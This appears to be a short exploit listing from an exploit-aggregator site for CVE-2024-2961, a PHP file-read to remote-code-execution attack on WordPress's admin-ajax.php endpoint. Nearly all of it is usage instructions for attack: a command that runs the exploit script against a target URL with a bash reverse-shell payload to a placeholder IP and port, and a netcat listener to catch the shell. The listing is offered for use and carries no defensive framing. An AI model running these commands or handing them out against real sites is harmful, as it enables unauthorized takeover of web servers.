Share 
## https://sploitus.com/exploit?id=489CF043-BA89-523B-A48C-B185684E802A
# PHP file-read to RCE (CVE-2024-2961)

## TODO Parse LIBC to know if patched
## INFORMATIONS
#### To use, implement the Remote class, which tells the exploit how to send the payload.

This exploit script targets the `admin-ajax.php` endpoint on WordPress to achieve remote code execution.

## Usage

```bash
python3 cnext-exploit.py 'http://blog.bigbang.com/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

```

Set up a listener to catch the reverse shell:

```bash
nc -lvnp port
```